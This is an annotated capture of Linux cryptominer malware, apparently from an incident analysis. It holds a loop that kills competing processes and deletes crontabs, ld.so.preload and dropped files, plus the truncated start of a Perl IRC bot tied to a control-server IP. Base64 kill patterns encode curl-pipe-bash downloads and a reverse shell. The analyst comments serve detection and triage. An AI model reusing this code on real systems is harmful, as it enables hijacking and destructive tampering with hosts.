ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'kpsmouseds' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'kintegrityds' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'thyrsi.com'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'z9ls.com' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'curl'| grep 'max-time'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'kthrotld' | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep 'hahwNEdB'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'CnzFVPLF'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'CvKzzZLs'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'aziplcr72qjhzvin'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/udevd'| awk '{print $2}' | xargs kill -9
# [analyst] NOTE(review): the next three patterns look like fragments of
# base64-encoded command lines; decoding them offline in an analysis
# environment may yield further addresses for the IoC list - not verified here.
ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'YmFzaCAtaSA+JiAvZGV2L3RjcC80NS43Ni4xOTEuMTExLzIwMTIgMD4mMQ'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'dog2.6'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'sustse'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'sustse3'| awk '{print $2}' | xargs kill -9
# [analyst] Download helpers: kills wget/curl processes that are fetching the
# named scripts or files.
ps aux | grep -v grep | grep 'mr.sh'| grep 'wget'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'mr.sh'| grep 'curl'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '2mr.sh'| grep 'wget' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '2mr.sh'| grep 'curl' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'cr5.sh'| grep 'wget' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'cr5.sh'| grep 'curl' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'j2.conf' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs kill -9
# [analyst] Mining-pool hostnames/ports and related strings in process command
# lines. The same strings can be searched for in DNS and proxy logs.
ps auxf| grep -v grep | grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "pool.t00ls.ru"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "monerohash.com"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
ps auxf| grep xiaoyao | awk '{print $2}'|xargs kill -9
ps auxf| grep xiaoxue | awk '{print $2}'|xargs kill -9
# [analyst] Network section: takes the "PID/program" column of `netstat -antp`
# for connections (ESTABLISHED or SYN_SENT) to two addresses and kills the
# owning process.
netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
# [analyst] pgrep section: -f matches the pattern against the full command
# line. Several patterns are generic ("perl", "stratum", "ynn", "sshd2"), so
# legitimate processes are hit as well, e.g. any running Perl program.
pgrep -f monerohash|xargs kill -9
pgrep -f L2Jpbi9iYXN|xargs kill -9
pgrep -f xzpauectgr|xargs kill -9
pgrep -f slxfbkmxtd|xargs kill -9
pgrep -f mixtape|xargs kill -9
pgrep -f addnj|xargs kill -9
pgrep -f 200.68.17.196|xargs kill -9
pgrep -f IyEvYmluL3NoCgpzUG|xargs kill -9
pgrep -f KHdnZXQgLXFPLSBodHRw|xargs kill -9
pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3|xargs kill -9
pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo|xargs kill -9
pgrep -f mwyumwdbpq.conf|xargs kill -9
pgrep -f honvbsasbf.conf|xargs kill -9
pgrep -f mqdsflm.cf|xargs kill -9
pgrep -f stratum|xargs kill -9
pgrep -f lower.sh|xargs kill -9
pgrep -f ./ppp|xargs kill -9
pgrep -f cryptonight|xargs kill -9
pgrep -f ./seervceaess|xargs kill -9
pgrep -f ./servceaess|xargs kill -9
pgrep -f ./servceas|xargs kill -9
pgrep -f ./servcesa|xargs kill -9
pgrep -f ./vsp|xargs kill -9
pgrep -f ./jvs|xargs kill -9
pgrep -f ./pvv|xargs kill -9
pgrep -f ./vpp|xargs kill -9
pgrep -f ./pces|xargs kill -9
pgrep -f ./rspce|xargs kill -9
pgrep -f ./haveged|xargs kill -9
pgrep -f ./jiba|xargs kill -9
pgrep -f ./watchbog|xargs kill -9
pgrep -f ./A7mA5gb|xargs kill -9
pgrep -f kacpi_svc|xargs kill -9
pgrep -f kswap_svc|xargs kill -9
pgrep -f kauditd_svc|xargs kill -9
pgrep -f kpsmoused_svc|xargs kill -9
pgrep -f kseriod_svc|xargs kill -9
pgrep -f kthreadd_svc|xargs kill -9
pgrep -f ksoftirqd_svc|xargs kill -9
pgrep -f kintegrityd_svc|xargs kill -9
pgrep -f jawa|xargs kill -9
pgrep -f oracle.jpg|xargs kill -9
pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN|xargs kill -9
pgrep -f 188.209.49.54|xargs kill -9
pgrep -f 181.214.87.241|xargs kill -9
pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ|xargs kill -9
pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj|xargs kill -9
pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK|xargs kill -9
pgrep -f servim|xargs kill -9
pgrep -f kblockd_svc|xargs kill -9
pgrep -f native_svc|xargs kill -9
pgrep -f sshd2|xargs kill -9
pgrep -f ynn|xargs kill -9
pgrep -f perl|xargs kill -9
pgrep -f 65ccEJ7|xargs kill -9
pgrep -f jmxx|xargs kill -9
pgrep -f 2Ne80nA|xargs kill -9
pgrep -f sysstats|xargs kill -9
pgrep -f systemxlv|xargs kill -9
pgrep -f watchbog|xargs kill -9
pgrep -f OIcJi1m|xargs kill -9
# [analyst] pkill section: sends the default signal (SIGTERM) to every process
# whose full command line matches. The list mixes miner names (minerd, xmrig,
# xmr-stak, cryptonight) with names of ordinary system daemons (polkitd,
# acpid, irqbalance); the latter are terminated too if they run under a user
# the script is allowed to signal.
pkill -f biosetjenkins
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f XJnRj
pkill -f mgwsl
pkill -f pythno
pkill -f jweri
pkill -f lx26
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f polkitd
pkill -f nanoWatch
pkill -f zigw
pkill -f devtool
pkill -f devtools
pkill -f systemctI
pkill -f watchbog
pkill -f cryptonight
pkill -f sustes
pkill -f xmrig
pkill -f xmr-stak
pkill -f suppoie
pkill -f zer0day.ru
pkill -f dbus-daemon--system
pkill -f nullcrew
pkill -f systemctI
pkill -f kworkerds
pkill -f init10.cfg
pkill -f /wl.conf
pkill -f crond64
pkill -f sustse
pkill -f vmlinuz
# [analyst] File section: deletes named files and directories under /tmp.
# Files that were already removed this way will not be found during later
# triage; rely on timestamps, logs and backups rather than on what is left.
rm -rf /tmp/wc.conf
rm -rf /tmp/sustse
rm -rf /tmp/php
rm -rf /tmp/p2.conf
rm -rf /tmp/pprt
rm -rf /tmp/ppol
rm -rf /tmp/javax/config.sh
rm -rf /tmp/javax/sshd2
rm -rf /tmp/.profile
rm -rf /tmp/1.so
rm -rf /tmp/kworkerds
rm -rf /tmp/kworkerds3
rm -rf /tmp/kworkerdssx
rm -rf /tmp/xd.json
rm -rf /tmp/syslogd
rm -rf /tmp/syslogdb
rm -rf /tmp/65ccEJ7
rm -rf /tmp/jmxx
rm -rf /tmp/2Ne80nA
rm -rf /tmp/dl
rm -rf /tmp/ddg
rm -rf /tmp/systemxlv
rm -rf /tmp/systemctI
rm -rf /tmp/.abc
rm -rf /tmp/osw.hb
rm -rf /tmp/.tmpleve
rm -rf /tmp/.tmpnewzz
rm -rf /tmp/.java
rm -rf /tmp/.omed
rm -rf /tmp/.tmpc
rm -rf /tmp/.tmpleve
rm -rf /tmp/.tmpnewzz
rm -rf /tmp/gates.lod
rm -rf /tmp/conf.n
rm -rf /tmp/update.sh
rm -rf /tmp/devtool
rm -rf /tmp/devtools
rm -rf /tmp/fs
rm -rf /tmp/.rod
rm -rf /tmp/.rod.tgz
rm -rf /tmp/.rod.tgz.1
rm -rf /tmp/.rod.tgz.2
rm -rf /tmp/.mer
rm -rf /tmp/.mer.tgz
rm -rf /tmp/.mer.tgz.1
rm -rf /tmp/.hod
rm -rf /tmp/.hod.tgz
rm -rf /tmp/.hod.tgz.1
rm -rf /tmp/84Onmce
rm -rf /tmp/C4iLM4L
rm -rf /tmp/lilpip
rm -rf /tmp/3lmigMo
rm -rf /tmp/am8jmBP
rm -rf /tmp/tmp.txt
rm -rf /tmp/baby
rm -rf /tmp/.lib
rm -rf /tmp/systemd
rm -rf /tmp/lib.tar.gz
rm -rf /tmp/baby
rm -rf /tmp/java
rm -rf /tmp/j2.conf
rm -rf /tmp/.mynews1234
rm -rf /tmp/a3e12d
rm -rf /tmp/.pt
rm -rf /tmp/.pt.tgz
rm -rf /tmp/.pt.tgz.1
rm -rf /tmp/go
rm -rf /tmp/java
rm -rf /tmp/j2.conf
rm -rf /tmp/.tmpnewasss
rm -rf /tmp/java
rm -rf /tmp/go.sh
rm -rf /tmp/go2.sh
rm -rf /tmp/.censusqqqqqqqqq
rm -rf /tmp/.kerberods
rm -rf /tmp/kerberods
rm -rf /tmp/seasame
rm -rf /tmp/touch
rm -rf /tmp/.p
rm -rf /tmp/runtime2.sh
rm -rf /tmp/runtime.sh
# [analyst] System locations: binaries under /usr/sbin and init scripts under
# /etc/rc.d/init.d and /etc/init.d. These deletions only succeed with write
# access to those directories. The paths themselves are worth checking on
# every host from this incident.
rm -f /usr/sbin/kerberods
rm -f /usr/sbin/kthrotlds
rm -f /usr/sbin/kintegrityds
rm -f /usr/sbin/kpsmouseds
rm -f /etc/rc.d/init.d/kerberods
rm -f /etc/init.d/netdns
rm -f /etc/rc.d/init.d/kthrotlds
rm -f /etc/rc.d/init.d/kpsmouseds
rm -f /etc/rc.d/init.d/kintegrityds
rm -rf /dev/shm/z3.sh
rm -rf /dev/shm/z2.sh
rm -rf /dev/shm/.scr
rm -rf /dev/shm/.kerberods
# [analyst] Removes /etc/ld.so.preload and /usr/local/lib/libioset.so, then
# clears the immutable flag on ld.so.preload and tries again.
# NOTE(review): presumably a preloaded library left by another campaign - not
# shown on this page. A non-empty /etc/ld.so.preload on an affected host
# should be inspected before the output of ps/ls on that host is trusted.
rm -f /etc/ld.so.preload
rm -f /usr/local/lib/libioset.so
chattr -i /etc/ld.so.preload
rm -f /etc/ld.so.preload
rm -f /usr/local/lib/libioset.so
rm -rf /tmp/watchdogs
# [analyst] System-wide cron files, including root's crontab in both common
# spool locations; these deletions succeed only with sufficient privileges.
rm -rf /etc/cron.d/tomcat
rm -rf /etc/cron.d/root
rm -rf /var/spool/cron/root
rm -rf /var/spool/cron/crontabs/root
rm -rf /etc/rc.d/init.d/watchdogs
rm -rf /usr/sbin/watchdogs
rm -f /tmp/kthrotlds
rm -f /etc/rc.d/init.d/kthrotlds
rm -rf /tmp/.sysbabyuuuuu12
rm -rf /tmp/logo9.jpg
rm -rf /tmp/miner.sh
rm -rf /tmp/nullcrew
rm -rf /tmp/proc
rm -rf /tmp/2.sh
rm -rf /tmp/.XIMunix
rm -f /var/tmp/dog2.61
rm -f /var/tmp/prot
rm -f /tmp/prot
rm -f /usr/sbin/kerberods
rm -f /usr/sbin/kthrotlds
rm -f /usr/sbin/kintegrityds
rm -f /usr/sbin/kpsmouseds
# [analyst] Script names inside the Confluence installation directory.
# NOTE(review): presumably downloads left there by other infections of the
# same service; files named N.sh / N.sh.N in /opt/atlassian/confluence/bin are
# a useful check on any Confluence host - confirm against a clean install.
rm /opt/atlassian/confluence/bin/1.sh
rm /opt/atlassian/confluence/bin/1.sh.1
rm /opt/atlassian/confluence/bin/1.sh.2
rm /opt/atlassian/confluence/bin/1.sh.3
rm /opt/atlassian/confluence/bin/3.sh
rm /opt/atlassian/confluence/bin/3.sh.1
rm /opt/atlassian/confluence/bin/3.sh.2
rm /opt/atlassian/confluence/bin/3.sh.3
rm -rf /var/tmp/f41
rm -rf /var/tmp/2.sh
rm -rf /var/tmp/config.json
rm -rf /var/tmp/xmrig
rm -rf /var/tmp/1.so
rm -rf /var/tmp/kworkerds3
rm -rf /var/tmp/kworkerdssx
rm -rf /var/tmp/kworkerds
rm -rf /var/tmp/wc.conf
rm -rf /var/tmp/nadezhda.
rm -rf /var/tmp/nadezhda.arm
rm -rf /var/tmp/nadezhda.arm.1
rm -rf /var/tmp/nadezhda.arm.2
rm -rf /var/tmp/nadezhda.x86_64
rm -rf /var/tmp/nadezhda.x86_64.1
rm -rf /var/tmp/nadezhda.x86_64.2
rm -rf /var/tmp/sustse3
rm -rf /var/tmp/sustse
rm -rf /var/tmp/moneroocean/
rm -rf /var/tmp/config.json
rm -rf /var/tmp/devtool
rm -rf /var/tmp/devtools
rm -rf /var/tmp/play.sh
rm -rf /var/tmp/systemctI
rm -rf /var/tmp/update.sh
rm -rf /var/tmp/.java
rm -rf /var/tmp/1.sh
rm -rf /var/tmp/conf.n
rm -r /var/tmp/lib
rm -r /var/tmp/.lib
# [analyst] Creates the empty file /tmp/lok (the 0-byte "lok" in the /tmp
# listing of this write-up) and a directory named /tmp/khugepageds.
# NOTE(review): the directory presumably keeps anything from being written as
# a file at that path - confirm.
touch /tmp/lok
mkdir -p /tmp/khugepageds
rm -rf /var/tmp/yum-confluence-*
};
# [analyst] Review annotation, not part of the captured sample.
# Main loop: calls KILLER, sleeps one second, and repeats without an exit
# condition. Every pass starts a few hundred short-lived ps/grep/awk/xargs
# pipelines. NOTE(review): this is presumably one source of the defunct
# ps/grep/awk/xargs entries in the process listing above and of part of the
# load on the host - confirm.
while true; do
KILLER
sleep 1;
done
bt1_bot (not working)
- perl irc-bot; the listing below is cut off in the middle of its first sub
cat /dev/shm/bt1.txt
#!/usr/bin/perl
# [analyst] Lines marked "[analyst]" are review annotations and are not part of
# the captured sample; every other line is reproduced unchanged.
# [analyst] Start-up section of the sample: settings, signal handling, change
# of the process title, fork. Variable names are Portuguese (processo =
# process, servidor = server, porta = port, canais = channels). The code that
# consumes most of these settings is outside this excerpt.
# [analyst] Name the process gives itself further down (assignment to $0).
my $processo =("test123");
# [analyst] Picks one of two URL path fragments at random; where $goni is used
# is not visible here.
my @titi = ("index.php?page=","main.php?page=");
my $goni = $titi[rand scalar @titi];
my $linas_max='3';
my $sleep='7';
# [analyst] NOTE(review): presumably the nicknames allowed to control the bot
# and the host check applied to them - the values look like placeholders.
my @adms=("x", "y", "z", "w" );
my @hostauth=("local");
my @canais=("#3w");
# [analyst] Runs `uname` and drops the last character of its output (the
# trailing newline); the result is kept as $nick.
chop (my $nick = `uname`);
# [analyst] Server address and candidate ports; one port is chosen at random
# per start. NOTE(review): presumably the IRC control server - the connect
# code is not in this excerpt. Outbound connections from an affected host to
# this address on tcp/80 or tcp/143 are worth searching for in flow, firewall
# and proxy logs.
my $servidor="193.56.28.207";
my $ircname =("g");
my $realname = ("g");
my @ircport = ("80","143");
my $porta = $ircport[rand scalar @ircport];
my $VERSAO = '0.5';
# [analyst] INT, HUP, TERM and CHLD are ignored, so a plain `kill <pid>`
# (SIGTERM) does not end the process; SIGKILL cannot be ignored. 'PS' is not a
# standard signal name.
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/tmp");
# [analyst] Overwrites the process title with "test123" followed by 16 NUL
# bytes, so the process list shows that name instead of the perl command
# line. Comparing the displayed name with /proc/<pid>/exe and /proc/<pid>/cwd
# exposes the mismatch.
$0="$processo"."\0"x16;;
# [analyst] Forks; the parent exits and the child carries on in the
# background. The die is reached only when fork failed (undefined return).
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
# [analyst] Package-level state. NOTE(review): presumably per-server and DCC
# transfer bookkeeping, judging by the names - not verifiable from this
# excerpt.
our %irc_servers;
our %DCC;
# [analyst] Two IO::Select sets. $sel_cliente is assigned without `my`, i.e.
# as a package global; the sample does not enable strict.
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]